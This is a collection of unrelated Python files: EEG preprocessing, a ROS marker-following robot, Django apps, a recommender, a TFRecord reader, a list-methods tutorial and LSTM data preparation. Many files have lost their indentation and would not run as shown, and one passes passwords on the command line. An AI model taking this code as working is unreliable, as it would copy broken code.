from braindecode.online.ring_buffer import RingBuffer
import numpy as np
from braindecode.datahandling.preprocessing import exponential_running_mean,\
exponential_running_var_from_demeaned
class StandardizeProcessor(object):
def __init__(self, factor_new=1e-3, eps=1e-4,
n_samples_in_buffer=10000):
self.factor_new = factor_new
self.eps = eps
self.n_samples_in_buffer = n_samples_in_buffer
def initialize(self, n_chans):
self.running_mean = None
self.running_var = None
self.sample_buffer = RingBuffer(np.zeros((
self.n_samples_in_buffer, n_chans), dtype=np.float32))
self.y_buffer = RingBuffer(np.zeros((
self.n_samples_in_buffer), dtype=np.float32))
def process_samples(self, samples):
standardized_samples = self.update_and_standardize(samples)
self.sample_buffer.extend(standardized_samples)
def update_and_standardize(self, samples):
if self.running_mean is not None:
assert self.running_var is not None
next_means = exponential_running_mean(samples,
factor_new=self.factor_new, start_mean=self.running_mean)
demeaned = samples - next_means
next_vars = exponential_running_var_from_demeaned(demeaned,
factor_new=self.factor_new, start_var=self.running_var)
standardized = demeaned / np.maximum(self.eps, np.sqrt(next_vars))
self.running_mean = next_means[-1]
self.running_var = next_vars[-1]
return standardized
else:
self.running_mean = np.mean(samples, axis=0)
self.running_var = np.var(samples, axis=0)
return (samples - self.running_mean) / np.maximum(self.eps,
np.sqrt(self.running_var))
def get_samples(self, start, stop):
return self.sample_buffer[start:stop]
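# A minimal usage sketch (assumes braindecode is installed; the random block below just
# stands in for samples arriving from a real acquisition loop):
if __name__ == '__main__':
    processor = StandardizeProcessor(factor_new=1e-3, eps=1e-4, n_samples_in_buffer=1000)
    processor.initialize(n_chans=8)
    incoming_block = np.random.randn(50, 8).astype(np.float32)
    processor.process_samples(incoming_block)
    print(processor.get_samples(0, 50).shape)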
|
#! /usr/bin/env python
# -*- coding:utf-8 -*-
__author__ = ["Rachel P. B. Moraes", "Fabio Miranda"]
import rospy
import numpy
from numpy import linalg
#import transformations
from tf import TransformerROS
import tf2_ros
import math
from geometry_msgs.msg import Twist, Vector3, Pose, Vector3Stamped
from ar_track_alvar_msgs.msg import AlvarMarker, AlvarMarkers
from nav_msgs.msg import Odometry
from sensor_msgs.msg import Image
from std_msgs.msg import Header
x = 0
y = 0
z = 0
id = 0
tfl = 0
buffer = tf2_ros.Buffer()
# x_desejado = 0.12
#y_desejado = 0.10
# z_desejado = 1.80
def recebe(msg):
    global x  # 'global' prevents creating a new local variable, so we can use the already declared global x
global y
global z
global id
for marker in msg.markers:
        #x = round(marker.pose.pose.position.x, 2) # round the decimal places so the printout looks ok
#y = round(marker.pose.pose.position.y, 2)
#z = round(marker.pose.pose.position.z, 2)
x = numpy.longdouble(marker.pose.pose.position.x)
y = numpy.longdouble(marker.pose.pose.position.y)
z = numpy.longdouble(marker.pose.pose.position.z)
print(type(x))
#print(x)
id = marker.id
#print(marker.pose.pose)
# if id == 5:
# print(buffer.can_transform("base_link", "ar_marker_5", rospy.Time(0)))
# header = Header(frame_id= "ar_marker_5")
        # # Looks up the coordinate-frame transform between the robot base and marker number 5
        # # Note that for your project 1 you will not need anything below,
        # # unless you want to take angles into account
        # trans = buffer.lookup_transform("base_link", "ar_marker_5", rospy.Time(0))
        # # Separate the translations from the rotations
        # t = transformations.translation_matrix([trans.transform.translation.x, trans.transform.translation.y, trans.transform.translation.z])
        # # Extract the rotations
        # r = transformations.quaternion_matrix([trans.transform.rotation.x, trans.transform.rotation.y, trans.transform.rotation.z, trans.transform.rotation.w])
# m = numpy.dot(r,t)
# v2 = numpy.dot(m,[0,0,1,0])
# v2_n = v2[0:-1]
# n2 = v2_n/linalg.norm(v2_n)
# cosa = numpy.dot(n2,[1,0,0])
# angulo_marcador_robo = math.degrees(math.acos(cosa))
# print("Angulo entre marcador e robo", angulo_marcador_robo)
def recebe2(msg):
    global x  # 'global' prevents creating a new local variable, so we can use the already declared global x
global y
global z
global id
    if not msg.markers:
print("Marker not found!")
for marker in msg.markers:
x = round(marker.pose.pose.position.x * 1e308 *100,2)
y = round(marker.pose.pose.position.y * 1e308 *100,2)
z = round(marker.pose.pose.position.z * 1e308 *1000000000,2)
#print(x)
print(marker.id, "x:", x, " y:", y, " z:", z)
# z = '{0:.315f}'.format(x)
# print(z[311:325])
# print('y',y * 1e308 *100)
if marker.id == 8:
if z < 10:
print('andando pra tras')
pub.publish(Twist(Vector3(-1,-1,0), Vector3(0,0,0)))
elif marker.id == 5:
if x > 3.5 and z > 5:
print('andando pra frente!')
pub.publish(Twist(Vector3(0.5,0.5,0), Vector3(10,0,0)))
if x < 3.5 and z > 5:
pub.publish(Twist(Vector3(0.5,0.5,5), Vector3(0,10,20)))
else:
pub.publish(Twist(Vector3(0,0,0), Vector3(0,0,0)))
#print(marker.pose.pose)
#numpy.longdouble
if __name__=="__main__":
global tfl
global buffer
    rospy.init_node("marcador")  # How our program declares its name to the ROS system
    recebedor = rospy.Subscriber("/ar_pose_marker", AlvarMarkers, recebe2)  # To receive notifications that markers were seen
    pub = rospy.Publisher("cmd_vel", Twist, queue_size=3)
    # velocidade_saida = rospy.Publisher("/cmd_vel", Twist, queue_size = 1) # So we can control the robot
    tfl = tf2_ros.TransformListener(buffer)  # For converting between coordinate frames - used to compute the marker/robot angle
    try:
        # Main loop - every ROS program should have one
while not rospy.is_shutdown():
a = None
rospy.sleep(1)
except rospy.ROSInterruptException:
print(" programa encerrado")
|
import sys
import os
import time
from asignacion_de_residencias import *
if len(sys.argv) != 5:
if len(sys.argv) == 2 and (sys.argv[1] == "-h" or sys.argv[1] == "--help"):
print "\nPara correr el programa se necesitan 4 parametros:\n" \
"\t-1.El nombre del archivo a crearse en la entrada\n" \
"\t-2.El numero m de hospitales\n" \
"\t-3.El numero n de pacientes\n" \
"\t-4.El nombre del archivo de salida\n" \
"Un ejemplo que corre correctamente es (desde la carpeta src):\n" \
"\tpython correr_asignacion.py 'in.txt' 100 100 'out.txt'\n " \
"Recuerde revisar en las carpetas in/ y out/ para ver los archivos correspondientes"
else:
print "Revise que esten bien las entradas. Para mas ayuda ingrese -h o --help"
exit()
cwd = os.getcwd().split('/')
if cwd[len(cwd) - 1] != "src":
print "El programa debe ser corrido desde la carpeta 'src' del proyecto"
exit()
nombre_archivo_problema = "../in/" + sys.argv[1]
nombre_archivo_salida = "../out/" + sys.argv[4]
m = sys.argv[2]
n = sys.argv[3]
crear_archivo_problema(nombre_archivo_problema, m, n)
start = time.time()
resolver_archivo_problema_con_archivo_salida(nombre_archivo_problema, nombre_archivo_salida)
end = time.time()
print("El problema de asignacion " + sys.argv[1] + " tardo " + str(end - start))
|
from django.shortcuts import render
def sample_task(request):
# Save true values of Channels and Functions in session.
request.session['trigger_channel'] = 'Facebook'
request.session['action_channel'] = 'Dropbox'
request.session['trigger_fn'] = 'new_photo_post_by_you'
request.session['action_fn'] = 'add_file_from_url'
description = "When I add a photo on Facebook, save it to Dropbox."
channels = ["Facebook", "Dropbox"]
trigger_fns = ["new_status_message_by_you",
"new_status_message_by_you_with_hashtag",
"new_link_post_by_you",
"new_link_post_by_you_with_hashtag",
"new_photo_post_by_you",
"new_photo_post_by_you_with_hashtag",
"new_photo_post_by_you_in_area"]
action_fns = ["add_file_from_url", "create_a_text_file",
"append_to_a_text_file"]
context = {'channels': channels, 'trigger_fns': trigger_fns,
'action_fns': action_fns, 'description': description}
return render(request, 'turk/sample_task.html', context)
def sample_conversation(request):
description = "When I add a photo on Facebook, save it to Dropbox."
trigger_channel = "Facebook"
action_channel = "Dropbox"
trigger_fn = "new_photo_post_by_you"
action_fn = "add_file_from_url"
context = {'trigger_channel': trigger_channel, 'trigger_fn': trigger_fn,
'action_channel': action_channel, 'action_fn': action_fn,
'description': description}
return render(request, 'turk/sample_conversation.html', context)
|
import logging
import sys
import inject
import datetime
sys.path.insert(0,'../../../python')
from model.config import Config
logging.getLogger().setLevel(logging.INFO)
from autobahn.asyncio.wamp import ApplicationSession
from asyncio import coroutine
'''
python3 getWorkedOvertimePeriod.py date1 date2
python3 getWorkedOvertimePeriod.py "01/01/2015" "31/12/2015"
'''
def config_injector(binder):
binder.bind(Config,Config('server-config.cfg'))
inject.configure(config_injector)
config = inject.instance(Config)
class WampMain(ApplicationSession):
def __init__(self,config=None):
logging.debug('instanciando WampMain')
ApplicationSession.__init__(self, config)
@coroutine
def onJoin(self, details):
print("********** MINUTOS TRABAJADOS DE REQUERIMIENTOS DE HORAS EXTRAS APROBADAS EN UN PERIODO **********")
if len(sys.argv) < 3:
sys.exit("Error de parámetros")
dateAux = sys.argv[1]
date1 = datetime.datetime.strptime(dateAux, "%d/%m/%Y").date()
dateAux = sys.argv[2]
date2 = datetime.datetime.strptime(dateAux, "%d/%m/%Y").date()
requests = yield from self.call('overtime.getOvertimeRequests', [], ["APPROVED"])
usersId = []
for request in requests:
if request["user_id"] not in usersId:
usersId.append(request["user_id"])
users = yield from self.call('users.findUsersByIds', usersId)
toPrint = []
for user in users:
requests = yield from self.call('overtime.getOvertimeRequests', [user["id"]], ["APPROVED"])
seconds = 0
if len(requests) == 0:
                continue
for request in requests:
dateAuxStr = request["begin"]
dateAux = dateAuxStr[:10]
date = datetime.datetime.strptime(dateAux, "%Y-%m-%d").date()
if(date >= date1) and (date <= date2):
seconds += yield from self.call('overtime.getWorkedOvertime', user["id"], date)
if seconds > 0:
append = user["id"] + ", " + user["name"] + ", " + user["lastname"] + ", " + user["dni"] + ", " + str(round(seconds/3600))
toPrint.append(append)
for pr in toPrint:
print(pr)
sys.exit()
if __name__ == '__main__':
from autobahn.asyncio.wamp import ApplicationRunner
from autobahn.wamp.serializer import JsonSerializer
url = config.configs['server_url']
realm = config.configs['server_realm']
debug = config.configs['server_debug']
json = JsonSerializer()
runner = ApplicationRunner(url=url,realm=realm,debug=debug, debug_wamp=debug, debug_app=debug, serializers=[json])
runner.run(WampMain)
|
import getopt
import sys
import os
import tensorflow as tf
def parseArgs():
short_opts = 'hw:u:p:t:c:b:v:'
long_opts = ['work-dir=', 'git-user=', 'git-pwd=', 'tfrecord-save-dir=', 'config-dir=', 'ubuntu-pwd=', 'verbose=']
config = dict()
config['work_dir'] = ''
config['tfrecord_save_dir'] = ''
config['config_dir'] = ''
config['git_user'] = ''
config['git_pwd'] = ''
config['ubuntu_pwd'] = ''
config['verbose'] = ''
###check little down for more configs
try:
args, rest = getopt.getopt(sys.argv[1:], short_opts, long_opts)
except getopt.GetoptError as msg:
print(msg)
print(f'Call with argument -h to see help')
exit()
for option_key, option_value in args:
if option_key in ('-w', '--work-dir'):
config['work_dir'] = option_value[1:]
elif option_key in ('-u', '--git-user'):
config['git_user'] = option_value[1:]
elif option_key in ('-p', '--git-pwd'):
config['git_pwd'] = option_value[1:]
elif option_key in ('-t', '--tfrecord-save-dir'):
config['tfrecord_save_dir'] = option_value[1:]
elif option_key in ('-c', '--config-dir'):
config['config_dir'] = option_value[1:]
elif option_key in ('-b', '--ubuntu-pwd'):
config['ubuntu_pwd'] = option_value[1:]
elif option_key in ('-v', '--verbose'):
if option_value[1:] == 'False':
config['verbose'] = False
else:
config['verbose'] = True
        elif option_key == '-h':
print(f'<optional> -w or --work-dir The directory where all work is done. Default: /tmp/work')
print(f'<optional> -u or --git-user The username for github repo')
print(f'<optional> -p or --git-pwd The password for github repo')
print(f'<optional> -c or --config-dir The directory to save config files to run this script twice or more, without \
doing the same packages again')
print(f'<optional> -b or --ubuntu-pwd The ubuntu user password to install packages with apt')
if config['work_dir'] == '':
config['work_dir'] = '/tmp/work/'
if config['tfrecord_save_dir'] == '':
config['tfrecord_save_dir'] = config['work_dir'] + 'tfrecord_files/'
if config['config_dir'] == '':
config['config_dir'] = config['work_dir'] + 'config-files/'
if config['git_user'] == '':
config['git_user'] = ''
if config['git_pwd'] == '':
config['git_pwd'] = ''
if config['ubuntu_pwd'] == '':
config['ubuntu_pwd'] = ''
if config['verbose'] == '':
config['verbose'] = True
###configs without argument, but perhaps depend on configs-with-arguments
config['filtered_out_config_file'] = config['config_dir'] + 'package-filtered-out.txt'
config['package_all_config_file'] = config['config_dir'] + 'package-all.txt'
config['package_work_config_file'] = config['config_dir'] + 'package-work.txt'
config['package_dont_work_config_file'] = config['config_dir'] + 'package-dont-work.txt'
config['package_binaries_config_file'] = config['config_dir'] + 'package-binaries.txt'
return config
def get_all_tfrecord_filenames(tfrecord_file_dir):
files = os.listdir(tfrecord_file_dir)
tfrecord_files = list()
for f in files:
if f.endswith(".tfrecord"):
tfrecord_files.append(f)
return tfrecord_files
def check_config(config):
if not os.path.isdir(config['tfrecord_save_dir']):
print(f"Directory with tfrecord files does not exist >{config['tfrecord_save_dir']}<, check -h for help")
exit()
def print_raw_record(raw_record):
feature_description = {
'func-signature': tf.io.FixedLenFeature([], tf.string, default_value=''),
'func-return-type': tf.io.FixedLenFeature([], tf.string, default_value=''),
'func-name': tf.io.FixedLenFeature([], tf.string, default_value=''),
'func-file-name': tf.io.FixedLenFeature([], tf.string, default_value=''),
'func-att-disas': tf.io.FixedLenFeature([], tf.string, default_value=''),
'func-intel-disas': tf.io.FixedLenFeature([], tf.string, default_value=''),
'ubuntu-package-name': tf.io.FixedLenFeature([], tf.string, default_value=''),
'ubuntu-package-binary': tf.io.FixedLenFeature([], tf.string, default_value=''),
}
ex = tf.io.parse_single_example(raw_record, feature_description)
print(f"func-signature\t---------->\n{ex['func-signature']}<")
print(f"func-return-type\t---------->\n{ex['func-return-type']}<")
print(f"func-name\t---------->\n{ex['func-name']}<")
print(f"func-file-name\t---------->\n{ex['func-file-name']}<")
print(f"func-att-disas\t---------->\n{ex['func-att-disas']}<")
print(f"func-intel-disas\t---------->\n{ex['func-intel-disas']}<")
print(f"ubuntu-package-name\t---------->\n{ex['ubuntu-package-name']}<")
print(f"ubuntu-package-binary\t---------->\n{ex['ubuntu-package-binary']}<")
#return ex['caller_callee'], ex['label']
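# Sketch of how a record matching the feature_description above could be produced
# (not part of the original pipeline; all field values below are placeholders):
def write_example_record(path):
    def _bytes_feature(text):
        return tf.train.Feature(bytes_list=tf.train.BytesList(value=[text.encode('utf-8')]))
    feature = {name: _bytes_feature('placeholder-' + name) for name in (
        'func-signature', 'func-return-type', 'func-name', 'func-file-name',
        'func-att-disas', 'func-intel-disas', 'ubuntu-package-name', 'ubuntu-package-binary')}
    example = tf.train.Example(features=tf.train.Features(feature=feature))
    with tf.io.TFRecordWriter(path) as writer:
        writer.write(example.SerializeToString())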
def main():
config = parseArgs()
check_config(config)
tfrecord_files = get_all_tfrecord_filenames(config['tfrecord_save_dir'])
for file in tfrecord_files:
print(f"Printing 5 examples from >{config['tfrecord_save_dir'] + file}<")
dataset = tf.data.TFRecordDataset(config['tfrecord_save_dir'] + file)
for raw_record in dataset.take(3):
example = tf.train.Example()
example.ParseFromString(raw_record.numpy())
print(f'Example >{example}<')
print_raw_record(raw_record)
exit()
if __name__ == "__main__":
main()
|
# list
kursus = ['masak', 'jahit', 'mengemudi','komputer', 'matematika']
pelajaran = ['matematika', 'bahasa indonesia', 'sejarah','ppkn']
# access data by the first index
print(kursus[0])
# access data by the last index, when you don't know what the last index is
print(kursus[-1])
# access data using index slicing
print(kursus[1:4])
# access data using slicing with the 3rd parameter, the step/skip parameter
print(kursus[::2])
# display the data from the first value to the last
print(kursus[:])
# display the data from the last value to the first with slicing and a step parameter
print(kursus[::-1])
# replace data
kursus[2] = 'komputer'
kursus[3] = 'mengemudi'
print(kursus)
# add data to the list; it is appended at the last index
kursus.append('nonton')
print(kursus)
# combine 2 lists into 1 list (this would nest the second list inside the first)
# kursus.append(pelajaran)
# print(kursus[:])
# to access data of a list inside a list
print(kursus[-1])
# add data to the list at a position we choose; it takes 2 parameters:
# the index number and the value
kursus.insert(3, 'main bola')
print(kursus)
# merge 2 lists into 1 list without creating a nested list; access works the same as a normal list
kursus.extend(pelajaran)
print(kursus)
# display the data from last to first using reverse instead of slicing
kursus.reverse()
print(kursus)
# remove from the list with pop, i.e. remove the last value
kursus.pop()
print(kursus)
# to know which value pop removed, store it in a variable
pop = kursus.pop()
print(pop)
print(kursus)
# remove from the list with remove; this method takes the value to delete, not an index
kursus.remove('ppkn')
print(kursus)
# delete all the values in the list
# print(kursus.clear())
# count how often an element appears in the list; if it is not present the count is 0
print(kursus.count('matematika'))
# find the index of a value in the list; this is useful when we want to know where a value
# actually sits, and once found we can apply other operations to it
print(kursus.index('main bola'))
# sort the list elements: alphabetically a-z by the first letter, or numerically 0-9 by the first digit
kursus.sort()
print(kursus)
# WRAPPER DESCRIPTOR
# concatenate two lists into one, almost the same as extend
print(kursus.__add__(pelajaran))
# this method is handy for checking whether a value is present in the list
print(kursus.__contains__('ppkn'))
# not sure yet how this method works
# print(kursus.__delattr__())
# delete an item by index, similar to remove (which deletes by value)
kursus.__delitem__(3)
print(kursus)
# compare values or elements (strings work too); if the types don't match it returns NotImplemented
print('matematika'.__eq__('matematika'))
print(kursus.__eq__(kursus))
print(kursus.__eq__(pelajaran))
print(kursus.__eq__('matematika'))
# not yet sure how to use this wrapper method
# print(kursus.__format__(kursus))
# print(help('FORMATTING'))
# 'greater or equal' comparison >=
print(kursus.__ge__(kursus))
# not sure yet how this method works
# print(kursus.__getattribute__('matematika'))
# print(kursus.__setattr__('music', 'pop'))
# access data by index, much like slicing with kursus[6], though slicing itself is awkward through this method
print(kursus.__getitem__(6))
# 'greater than' comparison >
print(kursus.__gt__(kursus))
# add items to the list, much like append or insert, but if the argument is not wrapped
# in a list the value gets split up element by element
print(kursus.__iadd__(['olahraga']))
# repeat the list elements as many times as the given parameter, much like var *= n
print(kursus.__imul__(1))
print(kursus.__mul__(2))
print(kursus.__rmul__(2))
# much like just accessing the variable; __iter__ returns an iterator over the values
a = kursus
a.__iter__()
print(a)
# 'less or equal' comparison <=
print(kursus.__le__(kursus))
print(kursus.__lt__(kursus))
# almost the same as len()
print(kursus.__len__())
# comparison, almost the same as != (not equal)
print(kursus.__ne__(pelajaran))
# helpers for pickle, not yet sure how to use them
# print(kursus.__reduce__())
# print(kursus.__reduce_ex__())
# almost the same as str()
print(kursus.__repr__())
# much like reverse or reversed, but it has to be wrapped in list() or consumed with a for loop
print(list(kursus.__reversed__()))
# for i in kursus.__reversed__():
#     print(i)
# __setitem__ is much like re-assigning a dict entry the usual way, a['music'] = 'dangdut'
a = {'music': 'rock'}
print(a)
a.__setitem__('music', 'pop')
print(a)
a['music'] = 'dangdut'
print(a)
# check how many bytes a variable takes up in memory; the two variables checked below
# will have different byte sizes
print(a.__sizeof__())
print(kursus.__sizeof__())
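# Equivalent, more idiomatic spellings of a few of the wrapper descriptors used above
# (just for comparison; the results match the dunder calls):
print('ppkn' in kursus)        # same as kursus.__contains__('ppkn')
print(len(kursus))             # same as kursus.__len__()
print(kursus + pelajaran)      # same as kursus.__add__(pelajaran)
print(list(reversed(kursus)))  # same as list(kursus.__reversed__())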
|
#coding:utf8
from base.IterativeRecommender import IterativeRecommender
import math
import numpy as np
from tool import qmath
from random import choice
from tool.qmath import sigmoid
from math import log
from collections import defaultdict
from scipy.sparse import *
from scipy import *
class WRMF(IterativeRecommender):
def __init__(self,conf,trainingSet=None,testSet=None,fold='[1]'):
super(WRMF, self).__init__(conf,trainingSet,testSet,fold)
def initModel(self):
super(WRMF, self).initModel()
self.X=self.P*10
self.Y=self.Q*10
self.m = self.data.getSize('user')
self.n = self.data.getSize(self.recType)
def buildModel(self):
userListen = defaultdict(dict)
for user in self.data.userRecord:
for item in self.data.userRecord[user]:
if item[self.recType] not in userListen[user]:
userListen[user][item[self.recType]] = 0
userListen[user][item[self.recType]] += 1
print ('training...')
iteration = 0
while iteration < self.maxIter:
self.loss = 0
YtY = self.Y.T.dot(self.Y)
I = np.ones(self.n)
for user in self.data.name2id['user']:
#C_u = np.ones(self.data.getSize(self.recType))
H = np.ones(self.n)
val = []
pos = []
P_u = np.zeros(self.n)
uid = self.data.getId(user,'user')
for item in userListen[user]:
iid = self.data.getId(item,self.recType)
r_ui = userListen[user][item]
pos.append(iid)
val.append(10*r_ui)
H[iid]+=10*r_ui
P_u[iid]=1
error = (P_u[iid]-self.X[uid].dot(self.Y[iid]))
self.loss+=pow(error,2)
#sparse matrix
C_u = coo_matrix((val,(pos,pos)),shape=(self.n,self.n))
A = (YtY+np.dot(self.Y.T,C_u.dot(self.Y))+self.regU*np.eye(self.k))
self.X[uid] = np.dot(np.linalg.inv(A),(self.Y.T*H).dot(P_u))
XtX = self.X.T.dot(self.X)
I = np.ones(self.m)
for item in self.data.name2id[self.recType]:
P_i = np.zeros(self.m)
iid = self.data.getId(item, self.recType)
H = np.ones(self.m)
val = []
pos = []
for user in self.data.listened[self.recType][item]:
uid = self.data.getId(user, 'user')
r_ui = self.data.listened[self.recType][item][user]
pos.append(uid)
val.append(10*r_ui)
H[uid] += 10*r_ui
P_i[uid] = 1
# sparse matrix
C_i = coo_matrix((val, (pos, pos)),shape=(self.m,self.m))
A = (XtX+np.dot(self.X.T,C_i.dot(self.X))+self.regU*np.eye(self.k))
self.Y[iid]=np.dot(np.linalg.inv(A), (self.X.T*H).dot(P_i))
#self.loss += (self.X * self.X).sum() + (self.Y * self.Y).sum()
iteration += 1
print ('iteration:',iteration,'loss:',self.loss)
# if self.isConverged(iteration):
# break
def predict(self, u):
'invoked to rank all the items for the user'
u = self.data.getId(u,'user')
return self.Y.dot(self.X[u])
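# Reference sketch of the weighted-ALS closed form that buildModel() solves per user:
# x_u = (Y^T C_u Y + reg * I)^{-1} Y^T C_u p(u). Everything below uses made-up shapes
# and plain numpy, independent of the class above.
def _wals_user_update(Y, confidence_u, preference_u, reg):
    k = Y.shape[1]
    C_u = np.diag(1.0 + confidence_u)           # per-item confidence weights for one user
    A = Y.T.dot(C_u).dot(Y) + reg * np.eye(k)   # k x k normal-equation matrix
    b = Y.T.dot(C_u).dot(preference_u)          # right-hand side
    return np.linalg.solve(A, b)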
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2018-08-06 12:53
from __future__ import unicode_literals
from django.db import migrations, models
import user_input.models
class Migration(migrations.Migration):
dependencies = [
('user_input', '0053_dailyuserinputstrong_activities'),
]
operations = [
migrations.AlterField(
model_name='dailyuserinputencouraged',
name='hr_level',
field=models.CharField(blank=True, max_length=10, validators=[user_input.models.CharMinValueValidator(45), user_input.models.CharMaxValueValidator(220)]),
),
migrations.AlterField(
model_name='dailyuserinputencouraged',
name='lowest_hr_during_hrr',
field=models.CharField(blank=True, max_length=10, validators=[user_input.models.CharMinValueValidator(45), user_input.models.CharMaxValueValidator(220)]),
),
migrations.AlterField(
model_name='dailyuserinputencouraged',
name='lowest_hr_first_minute',
field=models.CharField(blank=True, max_length=10, validators=[user_input.models.CharMinValueValidator(45), user_input.models.CharMaxValueValidator(220)]),
),
]
|
from abc import ABC, abstractmethod
# Abstract class for syntax checking
class SyntaxChecker(ABC):
def __init__(self):
super().__init__()
    # Syntax check, where
    # fileName (str) - file name
    # fileContent (str) - file contents
    # start (int) - start of the region being checked
    # end (int) - end of the region being checked
    # Returns
    # a list of errors
@abstractmethod
def checkSyntax(self, fileName, fileContent, start, end):
pass
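# A minimal concrete subclass sketch (hypothetical, not part of the original project):
# it only checks that parentheses are balanced in the requested slice of the file.
class ParenChecker(SyntaxChecker):
    def checkSyntax(self, fileName, fileContent, start, end):
        errors = []
        depth = 0
        for pos, ch in enumerate(fileContent[start:end], start=start):
            if ch == '(':
                depth += 1
            elif ch == ')':
                depth -= 1
                if depth < 0:
                    errors.append('{}: unmatched ")" at position {}'.format(fileName, pos))
                    depth = 0
        if depth > 0:
            errors.append('{}: {} unclosed "("'.format(fileName, depth))
        return errors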
|
from django.conf.urls import url, include
from . import views
urlpatterns = [
url(r'^home/$', views.neighborhood_home, name='home'),
url(r'^status/$', views.neighborhood_status, name='status'),
url(r'^index/$', views.index, name='index'),
url(r'^details/$', views.neighborhood_details, name='details'),
url(r'^get-neighborhoods/$', views.get_neighborhoods, name='get_neighborhoods'),
url(r'^get-event/$', views.get_event, name='get_event'),
url(r'^current-calendar/$', views.get_current_calendar, name='current_calendar'),
url(r'^specific-calendar/$', views.get_specific_calendar, name='specific_calendar'),
url(r'^new-event/$', views.new_event, name='new-event'),
]
|
t,x1,y1,x2,y2 = map(int,input().split())
s = str(input())
a = x2 - x1
b = y2 - y1
from itertools import islice
def nth_index(iterable, value, n):
matches = (idx for idx, val in enumerate(iterable) if val == value)
return next(islice(matches, n-1, n), None)
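# Quick self-check of nth_index with arbitrary values (not part of the original solution):
# the 2nd 'E' in "ENEN" sits at index 2, and a 3rd 'E' does not exist, giving None.
assert nth_index("ENEN", 'E', 2) == 2
assert nth_index("ENEN", 'E', 3) is None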
if a > 0 and b > 0:
f = nth_index(s,'E',a)
l = nth_index(s,'N',b)
if s.count('E') < abs(a) or s.count('N') < abs(b):
final = -1
else:
final = max(f,l)+1
elif a > 0 and b < 0 :
f = nth_index(s,'E',abs(a))
l = nth_index(s,'S',abs(b))
if s.count('E') < abs(a) or s.count('S') < abs(b):
final = -1
else:
final = max(f,l)+1
elif a < 0 and b > 0:
f = nth_index(s,'W',abs(a))
l = nth_index(s,'N',abs(b))
if s.count('W') < abs(a) or s.count('N') < abs(b):
final = -1
else:
final = max(f,l)+1
elif a < 0 and b < 0:
f = nth_index(s,'W',abs(a))
l = nth_index(s,'S',abs(b))
if s.count('W') < abs(a) or s.count('S') < abs(b):
final = -1
else:
final = max(f,l)+1
elif a > 0 and b == 0:
f = nth_index(s,'E',abs(a))
if s.count('E') < abs (a):
final = -1
else:
final = f+1
elif a < 0 and b == 0:
f = nth_index(s,'W',abs(a))
if s.count('W') < abs (a):
final = -1
else:
final = f+1
elif a == 0 and b > 0:
f = nth_index(s,'N',abs(b))
if s.count('N') < abs (b):
final = -1
else:
final = f+1
elif a == 0 and b < 0:
    f = nth_index(s,'S',abs(b))
    if s.count('S') < abs(b):
        final = -1
    else:
        final = f+1
else:
    # a == 0 and b == 0: already at the destination, so no steps are needed
    final = 0
print(final)
|
# Generated by Django 2.0.3 on 2018-04-08 10:59
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('recipes', '0005_auto_20180408_1041'),
]
operations = [
migrations.RemoveField(
model_name='medicinerequest',
name='medicine_request_status',
),
migrations.AddField(
model_name='medicinerequest',
name='given_medicine',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='recipes.Medicine'),
),
]
|
from django.contrib.auth.models import User, AbstractUser
from django.db import models
from mptt.fields import TreeManyToManyField
from django.urls import reverse
from listy.models import Category
from django.conf import settings
from django.contrib.auth import get_user_model
#
class ProfilManager(models.Manager):
pass
# Create your models here.
class Profil(models.Model):
user = models.OneToOneField(User, null=True, on_delete=models.CASCADE)
email_confirmed = models.BooleanField(default=False)
imie = models.CharField(max_length=50, null=True, blank=True, default="")
nazwisko = models.CharField(max_length=50, null=True, blank=True, default="")
profilimg = models.ImageField(upload_to='media/profiles/', blank=True, null=True, default='media/1.jpg')
opis = models.TextField(blank=True)
kategoria= models.ForeignKey(Category, verbose_name="Kategoria", null=True, blank=True, on_delete=models.DO_NOTHING)
kod = models.DecimalField(max_digits=6, decimal_places=0, null=True, blank=True)
strona = models.CharField(max_length=255, null=True, blank=True, default="np www.mojadomena.pl")
telefon = models.CharField(max_length=50, null=True, blank=True, default="")
profesja = models.CharField(max_length=50, null=True, blank=True, default="")
miasto = models.CharField(max_length=50, null=True, blank=True, default="")
port1 = models.ImageField(upload_to='media/portfolio/', blank=True, null=True, default='media/1.jpg', verbose_name="galeria zdjęcie nr 1")
port2 = models.ImageField(upload_to='media/portfolio/', blank=True, null=True, default='media/1.jpg', verbose_name="galeria zdjęcie nr 2")
port3 = models.ImageField(upload_to='media/portfolio/', blank=True, null=True, default='media/1.jpg', verbose_name="galeria zdjęcie nr 3")
port4 = models.ImageField(upload_to='media/portfolio/', blank=True, null=True, default='media/1.jpg', verbose_name="galeria zdjęcie nr 4")
port5 = models.ImageField(upload_to='media/portfolio/', blank=True, null=True, default='media/1.jpg', verbose_name="galeria zdjęcie nr 5")
class Meta:
verbose_name = "Profil"
verbose_name_plural = "Profile"
def __str__(self):
return f'{self.user.username}'
def get_absolute_url(self):
return reverse('profil_view', args=[str(self.id)])
|
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.callbacks import EarlyStopping
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import mean_squared_error
import os, math
import keras.backend as K
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.style as style
style.use('fivethirtyeight')
#print(style.available)
def loadData(link):
data = pd.read_csv(link)
datetimeColName = data.columns[0]
data[datetimeColName] = pd.to_datetime(data[datetimeColName])
data.set_index(datetimeColName, inplace=True)
    data = data.sort_index()
return data
def scale_to_0and1(data):
scaler = MinMaxScaler(feature_range=(0, 1)) # MinMax Scaler
data = scaler.fit_transform(data) # input: ndarray type data
return(data, scaler)
# split into train and test sets
def splitData(data, trainPercent=0.7, split_by_time=False, split_date=None):
if split_by_time is False:
train_size = int(len(data) * trainPercent)
train_data, test_data = data.iloc[0:train_size,], data.iloc[train_size:,]
print("\n", "train length:", len(train_data),"\n", "test length:", len(test_data))
elif split_by_time is True:
        # split_date = pd.Timestamp("01-01-2011")
        train_data = data.loc[:split_date, :]
        train_data.drop(split_date, axis=0, inplace=True)
        test_data = data.loc[split_date:, :]
return(train_data, test_data)
def reshapeForLSTM(data, time_steps=None):
"""
:param data: intput data
:param time_steps: time steps after
:return: reshaped data for LSTM
"""
"""
The LSTM network expects the input data (X)
to be provided with
a specific array structure in the form of:
[samples, time steps, features].
"""
if time_steps is None:
print("please denote 'time_steps'...!")
return(None)
else:
data_reshaped = np.reshape(data, (data.shape[0], time_steps, 1))
return(data_reshaped)
# --- create dataset with window size --- #
